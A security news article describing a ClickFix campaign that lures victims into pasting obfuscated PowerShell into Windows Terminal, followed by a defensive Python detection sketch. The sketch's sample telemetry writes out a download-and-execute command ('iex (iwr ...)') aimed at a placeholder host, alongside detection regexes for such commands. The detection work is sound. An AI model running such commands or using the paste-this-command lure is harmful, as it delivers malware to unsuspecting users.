Security researchers have discovered a new ClickFix social engineering campaign that abuses Windows Terminal to run malicious payloads on compromised systems. The activity, which Microsoft Defender specialists noticed in February 2026, demonstrates how attackers are refining their methods to evade common security detections and make malicious instructions appear more authentic to users.

Social engineering is a major component of ClickFix attacks. Rather than taking advantage of software flaws, attackers deceive victims into executing malicious commands themselves. In this campaign, the attackers instructed victims to open Windows Terminal instead of the conventional Windows Run dialog. This small adjustment helps the attack blend in with regular administrative activity.

A Novel Method of Execution with Windows Terminal

Victims of earlier ClickFix campaigns were typically told to hit Win + R, paste a command, and run it via the Run dialog. Monitoring systems and security tools are becoming more adept at identifying this pattern of behavior. To circumvent those defenses, attackers now instruct victims to press Windows + X and then I to launch Windows Terminal (wt.exe).

Windows Terminal is a legitimate command-line environment that developers and administrators use to run PowerShell, Command Prompt, and other shells. Because it is frequently used for system management tasks, launching it does not seem suspicious at first. This makes the method more convincing to users and harder for automated security systems to flag as malicious activity.

[Image: Windows Is the Target of the ClickFix Attack (Source: MsftSecIntel)]

The attacker instructs victims to paste a PowerShell command after the terminal opens. Usually obfuscated, these commands are intended to download or run more malware from distant servers. Attackers are able to gain an initial foothold on the system because the execution takes place directly within the terminal environment.

Lures of Social Engineering Deliver the Payload

Deceptive websites and seemingly innocuous prompts are used to deliver the malicious instructions. Victims may encounter fake CAPTCHA pages, system verification messages, or troubleshooting instructions claiming the user must copy and paste a command to fix a problem or verify they are human. These prompts have been meticulously designed to resemble authentic technical instructions.
For instance, the page may state that the command is necessary to enable access to protected content, fix a connection problem, or validate the user's browser. Because the instructions resemble standard troubleshooting procedures, victims may follow them without realizing they are running malicious code.

Attackers have a number of advantages when they use Windows Terminal as the execution environment. The technique bypasses security detections that focus on Run dialog abuse, reduces suspicion among users familiar with command-line tools, and provides a direct way to run PowerShell payloads with fewer restrictions.

Security experts recommend that organizations educate users about copy-paste attacks and closely monitor suspicious PowerShell activity. Blocking untrusted scripts, restricting administrative command execution, and improving user awareness can help reduce the risk posed by evolving ClickFix campaigns.
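
As an added example (not code from Microsoft or from this article's source), the sketch below shows one way to monitor PowerShell activity for the pattern described above. It assumes process-creation telemetry and PowerShell script block logging are both collected, that a shell opened in Windows Terminal has WindowsTerminal.exe as its parent, and it runs on constructed events with simplified field names. A command pasted into an already open shell starts no new process, so the rule correlates the shell's PID with the logged script text.

```python
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b", re.I)
EXEC = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
ENCODED = re.compile(r"FromBase64String|\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)

# Constructed sample telemetry; field names and paths are simplified assumptions.
# Process creation: which shells were started by Windows Terminal.
PROCESS_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\WindowsApps\PLACEHOLDER\WindowsTerminal.exe"},
    {"pid": 5300, "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]
# Script block logging: what was actually typed or pasted into each shell.
SCRIPT_BLOCKS = [
    {"pid": 4120, "text": "Get-ChildItem C:\\Users"},
    {"pid": 4120, "text": "Invoke-WebRequest hxxps://example[.]invalid/tool.zip -OutFile tool.zip"},
    {"pid": 4120, "text": "iex (iwr hxxps://example[.]invalid/v -UseBasicParsing)"},
    {"pid": 5300, "text": "iex (iwr hxxps://example[.]invalid/v -UseBasicParsing)"},
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def terminal_hosted_shells(process_events):
    """PIDs of PowerShell hosts whose parent process is Windows Terminal."""
    return {e["pid"] for e in process_events
            if basename(e["image"]) in SHELLS
            and basename(e["parent_image"]) == "windowsterminal.exe"}

def flag_script_blocks(process_events, script_blocks):
    """Flag script blocks from terminal-hosted shells that fetch and execute
    remote content in one command, or that carry an encoded payload."""
    hosted = terminal_hosted_shells(process_events)
    alerts = []
    for block in script_blocks:
        if block["pid"] not in hosted:
            continue
        reasons = []
        if FETCH.search(block["text"]) and EXEC.search(block["text"]):
            reasons.append("download-and-execute")
        if ENCODED.search(block["text"]):
            reasons.append("encoded-payload")
        if reasons:
            alerts.append((block["pid"], block["text"], reasons))
    return alerts
```

The plain download in the second sample event is deliberately not flagged, since administrators fetch files from a terminal routinely; only the combined fetch-and-execute or an encoded payload raises an alert.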












